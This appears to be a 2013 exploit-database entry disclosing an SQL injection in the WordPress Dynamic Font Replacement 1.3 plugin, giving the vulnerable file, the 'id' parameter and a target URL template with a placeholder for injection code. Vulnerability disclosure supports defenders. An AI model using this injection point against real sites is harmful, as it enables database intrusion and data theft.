id: 20239
date: 01/27/2013
title: Wordpress Dynamic Font Replacement 1.3 plugin SQL Injection Vulnerability
author: bd0rk
cves: 

# Exploit Title: Wordpress Dynamic Font Replacement 1.3 plugin SQL Injection Vulnerability 
# Date: 2013-01-27
# Author: bd0rk
#Software Link: http://downloads.wordpress.org/plugin/dynamic-font-replacement-4wp.zip
# Version: 1.3 EN
# Category:: web applications
# Google dork: n/a -->script-kiddieprotected
# Tested on: Windows and Ubuntu-Linux

----------------------------------------------------------------------------

Vulnerable code infile /admin/listings.php

SQL Injection Parameter: 'id'

[+]spl0iT: http://[target]/wp-content/plugins/dynamic-font-replacement-4wp/admin/listings.php?id=[SQLInjection-Code]

----------------------------------------------------------------------------

Greetings from cold Germany, bd0rk.

==> REST IN PEACE AARON SWARTZ <==

#  0day.today [2023-03-23]  #